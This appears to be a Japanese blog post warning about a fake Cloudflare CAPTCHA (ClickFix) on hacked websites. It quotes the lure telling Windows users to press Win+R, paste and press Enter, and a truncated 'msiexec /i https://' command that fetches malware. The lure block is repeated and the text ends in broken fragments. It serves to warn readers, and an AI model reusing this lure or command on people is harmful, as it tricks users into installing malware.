<改ざん後のページタイトル、不正な日本語メッセージ>
Checking if you are human
---
以下の操作を完了して、人間であることを確認してください。
□ 私はロボットではありません Cloudflare
[ドメイン名] 続行する前に接続のセキュリティを確認する必要があります。
Ray ID: [英数字]
Platform performance and security Cloudflare
---
---
ロボットではないことを証明するために:
1. Windowsキー + R を押し続けてください。
2. 検証ウィンドウで Ctrl + V を押してください。
3. Enter を押して完了します。
続行すると、次を確認します:
✅ "I am not a robot - reCAPTCHA Verification ID: [数字]"
上記の手順を実行して検証を完了してください。 [続行する]
---
<クリップボードにコピーされる攻撃処理>
[msiexec /i https:// ~ 以下略]
Windows 環境を狙いマルウェア (コンピュータウイルス) をダウンロードして感染させるコマンドになっていて、ユーザーにショートカットキーを押させることで 「ファイル名を指定して実行」 ダイアログから起動させる
(コマンドはスマートフォン、携帯電話、Mac 環境では動作しないので影響なし)
コメント一覧 (1)
企業HP、美容院、クリニック(病院)、社団法人、会計事務所、飲食店、宿泊施設、等々…、何か WordPress 関連の脆弱性が原因で攻撃者がサーバーに不正アクセスか。
Cloudflare を名乗ってロゴマークの表示も見えるけど、詐欺師が Cloudflare になりすましているだけの偽 CAPTCHA 画面。
<改ざん後のページタイトル、不正な日本語メッセージ>
Checking if you are human
---
以下の操作を完了して、人間であることを確認してください。
□ 私はロボットではありません Cloudflare
[ドメイン名] 続行する前に接続のセキュリティを確認する必要があります。
Ray ID: [英数字]
Platform performance and security Cloudflare
---
ユーザーが 「□ 私はロボットではありません」 部分をマウスでクリックすると、ショートカットキーを押すキーボード操作の案内がニューッと出現し、ClickFix 攻撃が始動する
---
ロボットではないことを証明するために:
1. Windowsキー + R を押し続けてください。
2. 検証ウィンドウで Ctrl + V を押してください。
3. Enter を押して完了します。
続行すると、次を確認します:
✅ "I am not a robot - reCAPTCHA Verification ID: [数字]"
上記の手順を実行して検証を完了してください。 [続行する]
---
<クリップボードにコピーされる攻撃処理>
[msiexec /i https:// ~ 以下略]
Windows 環境を狙いマルウェア (コンピュータウイルス) をダウンロードして感染させるコマンドになっていて、ユーザーにショートカットキーを押させることで 「ファイル名を指定して実行」 ダイアログから起動させる
(コマンドはスマートフォン、携帯電話、Mac 環境では動作しないので影響なし)
Firefly (ファイヤーフ
ライ)
が
しました